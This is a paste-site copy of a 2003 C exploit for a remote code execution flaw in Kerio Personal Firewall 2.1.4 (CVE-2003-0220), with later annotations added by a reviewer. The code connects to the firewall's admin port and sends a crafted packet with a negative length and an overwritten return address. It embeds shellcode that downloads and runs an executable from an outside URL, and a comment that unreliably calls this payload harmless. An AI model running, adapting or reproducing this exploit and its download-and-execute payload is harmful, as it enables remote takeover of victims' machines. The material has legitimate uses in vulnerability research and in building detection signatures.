FlyFar

Kerio Personal Firewall 2.1.4 - Remote Code Execution - CVE-2003-0220

Jan 24th, 2024
  1. /*
  2.  * Kerio Personal Firewall v2.1.4 remote code execution exploit
  3.  * Tested on Windows XP with SP1
  4.  *
  5.  * In order to exploit, for ease of mind, set the firewall to permit all traffic, or allow
  6.  * a connection to port 44334 from your testing unix shell ip.
  7.  *
  8.  * It is also possible to use UDP instead of TCP
  9.  *
  10.  * It works out very well, if not, hit a few times with a ret addr of 0x41414141 to make it crash
  11.  * AT THAT addr. Then use the original one, it will work. The one I used points to a 'call esp'
  12.  * inside the RPCRT4.DLL.
  13.  */
  14.  
  15. #include <stdio.h>
  16. #include <stdlib.h>
  17. #include <unistd.h>
  18. #include <errno.h>
  19. #include <string.h>
  20. #include <netdb.h>
  21. #include <sys/types.h>
  22. #include <netinet/in.h>
  23. #include <sys/socket.h>
  24.  
#define PORT 44334 // the port client will be connecting to, default Kerio admin port
#define retpos 5272 // offset in buf where main() writes the 4 return-address bytes (retpos-4 .. retpos-1)
#define MAXDATASIZE 5277 // max number of bytes we can get, also size of buffer

// global vars

struct sockaddr_in their_addr; // connector's address information
char buf[MAXDATASIZE];         // shared buffer: suck() receives into it, main() later rebuilds it as the packet
int numbytes;                  // byte count returned by the most recent recv() in suck()

/*
 * Payload bytes copied into buf by main(). Read straight off the hex below:
 *   - 60 bytes of 0x90 (x86 NOP) padding at the front;
 *   - a code stub beginning EB 30 (x86 short jmp +0x30); presumably it walks
 *     the string table that follows and looks the names up at run time --
 *     not verified here;
 *   - a 0x08-separated ASCII table: GetModuleHandleA, kernel32.dll,
 *     GetProcAddress, LoadLibraryA, _lcreat, _lwrite, GlobalAlloc, _lclose,
 *     WinExec, ExitProcess, wininet.dll, InternetOpenA, InternetOpenUrlA,
 *     InternetReadFile, InternetCloseHandle, NS, nssc.exe, then the
 *     download URL, closed by the bytes 0x08 0x01.
 * Detection note: the API names, the drop file name and the URL travel in
 * plaintext inside the packet, so they are the signature-friendly part of it.
 * main() measures this array with strlen(), so it must contain no 0x00 byte
 * (none appears in the escapes below).
 */
unsigned char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\xEB\x30\x5F\xFC\x8B\xF7\x80"
"\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB2\x04\xC1"
"\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB2\x7C\x8B"
"\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF8\x8B\x40"
"\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0C\x03\x7D"
"\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8B\xF8\x33"
"\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7A\x03\x80"
"\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x51\xF3\xA6"
"\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC1\xE0\x02"
"\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x40\x3C\x03"
"\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF0\xAD\x03"
"\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xFC\x8D\x76"
"\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5E\x74\x06"
"\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0E\xEB\x02"
"\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5D\xFC\x8D"
"\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x45\xE4\xFC"
"\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x43\xE2\xE1"
"\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x53\x51\x53"
"\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x43\xEB\xF9"
"\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD4\xFF\xD0"
"\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xFF\xD0\x8D"
"\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x52\x8D\x7B"
"\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB6\x1F\xC1"
"\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8B\x45\xB4"
"\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xDC\xFF\xD0"
"\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x8B\x45\xD8\xFF\xD0\x8B\x55\xA4"
"\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xCC\xFF\xD0"
"\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6F\x64\x75"
"\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x32\x2E\x64"
"\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x08\x4C\x6F"
"\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x74\x08\x5F"
"\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x63\x08\x5F"
"\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x69\x74\x50"
"\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2E\x64\x6C\x6C\x08\x49"
"\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x72\x6E\x65"
"\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x52\x65"
"\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6F\x73\x65"
"\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2E\x65\x78\x65\x08"
  "http://reversedhell.net/hackyou.exe"
  "\x08\x01"; // download + exec from the net ; donno who wrote this sc
  118.  
  119.   //change the url to whatever, this one pops up an inoffensive message box
  120.  
  121. // end of global vars
  122.  
/*
 * Read the peer's greeting from sock into the global buf, chunk by chunk, and
 * dump every received byte to stderr as a decimal number, ten per line.
 *
 * sock: connected TCP socket.
 * n:    length handed to each recv() call, and the count at which the loop
 *       gives up. NOTE(review): n is used directly as the recv() buffer length,
 *       so it must never exceed MAXDATASIZE (the one caller passes 266).
 * Returns i, the byte count accumulated below (numbytes for the first chunk,
 * numbytes-1 for every later one). Calls exit(1) if recv() fails.
 * Side effects: overwrites buf and the global numbytes.
 */
int suck(int sock,int n)
{
    int i=0,j=0,k,a=0,b=0,c=0,d=0;

    while (i<n)
    {

        if ((numbytes=recv(sock, buf, n, 0)) == -1) {
                perror("recv");
                exit(1);
           }
            // NOTE(review): recv() returning 0 (peer closed the connection)
            // is not handled; once j > 0 the line below then lowers i by one
            // on every pass and the loop never terminates.

            if (j) i+=(numbytes-1); // ya i know i know :D
       
            else i+=numbytes;

            // "%4.0d" prints an empty field for the value 0 (precision 0), which
            // is why zero bytes get their own case. buf is plain char, so on a
            // signed-char platform bytes >= 0x80 are printed as negatives.
            for (k=0;k<numbytes;k++) {
                            if (k % 10 == 0) fprintf(stderr,"\n");
                            if (buf[k]==0) fprintf(stderr,"    0 ");
                            else fprintf(stderr," %4.0d ",buf[k]);
                             } 


            fprintf(stderr,"    * ");
            j++;
            // Look at the tail of the chunk for the 01 00 01 00 end marker.
            // NOTE(review): buf[numbytes] is one past the data just received
            // (it holds the zero main() put there, or a byte left by an earlier,
            // longer chunk), and numbytes-1..-3 go negative when fewer than
            // three bytes arrive. Both are reads outside the received range.
            d=buf[numbytes];
            c=buf[numbytes-1];
            b=buf[numbytes-2];
            a=buf[numbytes-3];
            if ((i>200) && (a==0x1) && (b==0x0) && (c==0x1) && (d==0x0)) break;
        }
        fprintf(stderr,"\n");
        return i;
}
  157.  
  158.  
/*
 * Entry point. Resolves argv[1], connects to PORT, reads and dumps the
 * firewall's greeting via suck(), then fills the global buf as one
 * MAXDATASIZE-byte packet and sends it in a single send() call.
 * Usage: <prog> hostname. Any failure prints perror() output and exits 1.
 */
int main(int argc, char *argv[])
{
    int sockfd, i,j;  
    struct hostent *he;

    if (argc != 2) {
        fprintf(stderr,"usage: ./%s hostname\n",argv[0]);
        exit(1);
    }

    // NOTE(review): gethostbyname() is obsolete (IPv4 only, static result
    // buffer); getaddrinfo() is the portable replacement. h_addr is a
    // compatibility alias for h_addr_list[0] that some libcs expose only
    // under their default feature macros.
    if ((he=gethostbyname(argv[1])) == NULL) {  // get the host info
        perror("gethostbyname");
        exit(1);
    }

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { // prepare a socket for connecting
        perror("socket");
        exit(1);
    }

    their_addr.sin_family = AF_INET;    // host byte order
    their_addr.sin_port = htons(PORT);  // short, network byte order
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    memset(&(their_addr.sin_zero), '\0', 8);  // zero the rest of the struct

    // sizeof(struct sockaddr) is passed for a sockaddr_in; the two coincide
    // on the usual ABIs, but sizeof their_addr would say what is meant.
    if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1) {
        perror("connect");
        exit(1);
    }

   
    // NOTE(review): "%d" with a size_t argument is undefined ("%zu" is the
    // matching specifier), and strlen() on an unsigned char array needs a cast
    // to const char *; both are -Wall warnings. The length is only right while
    // the array holds no 0x00 byte.
    fprintf(stderr,"shell len = %d\n",strlen(shellcode));
    fprintf(stderr,"Connected to firewall.\n");
    memset(buf,0x0,sizeof(buf));   // suck() reads one byte past each chunk; this zeroing is what it sees there
    fprintf(stderr,"Sucking buffer..\n");
    suck(sockfd,266);              // 266 <= MAXDATASIZE, which suck() needs for its recv() length
    fprintf(stderr,"\nBuffer ***** by black hole..\n");
    memset(buf,0x0,sizeof(buf));
    fprintf(stderr,"-------------------------------------------------\n");
    fprintf(stderr,"                 - BANNER -   \n");
    fprintf(stderr,"-------------------------------------------------\n");
    sleep(1);
    fprintf(stderr,"coded by Burebista (aanton@reversedhell.net)\n");
    fprintf(stderr,"           released on - 5 Apr 2003 -\n");
    
    sleep(2);
    fprintf(stderr,"-------------------------------------------------\n");
    memset(buf,0x90,MAXDATASIZE); // set nops all over
    
    // prepares call up to beginning of buffer 32 bit=5 bytes
    buf[MAXDATASIZE-1]='\xff'; //
    buf[MAXDATASIZE-2]='\xff'; // call -1150
    buf[MAXDATASIZE-3]='\xee'; //
    buf[MAXDATASIZE-4]='\xab'; //
    buf[MAXDATASIZE-5]='\xe8'; //
                          
    j=0;
    // insert the shellcode in buf at 900
    // NOTE(review): there is no bound check on this copy -- it relies on
    // 900 + strlen(shellcode) staying below retpos-4 (otherwise the writes
    // below clobber the array's tail) and below MAXDATASIZE (otherwise it
    // writes past buf). strlen() is also re-evaluated on every iteration.
    for (i=900;j<strlen(shellcode);i++) buf[i]=shellcode[j++];
    
    // prepares the new return address (on XPSP1 it is CALL ESP in RPCRT4.DLL)
  
    buf[retpos-1]='\x78';
    buf[retpos-2]='\x07';
    buf[retpos-3]='\x06';
    buf[retpos-4]='\x90';
    
    // this prepares packet header with negative length
    
    buf[0]=0;
    buf[1]=0;
    buf[2]=0x14;
    buf[3]=0xffffff9c; // negative, -100. firewall will prepare
                             // buf of that size. signed integers hit again
                             // (int -> char conversion of 0xffffff9c is
                             // implementation-defined; on two's-complement
                             // targets it stores byte 0x9c, i.e. (char)0x9c.)

    
    // NOTE(review): on a stream socket send() may transfer fewer than
    // sizeof(buf) bytes; only the -1 case is checked, a short send is not.
    if ((send(sockfd, buf,sizeof(buf),0)) == -1 ) { // PASARAN!
       perror("send");
       exit(1);
    }
    fprintf(stderr,"..pasaran...\n");
    fprintf(stderr,":D Done!\n");
    
    close(sockfd);
    // main falls off the end: C99 makes that an implicit return 0. The
    // exit(1) paths above never close sockfd; the OS reclaims it at exit.
}
  244.  
  245.  
  246. // milw0rm.com [2003-05-08]
  247.            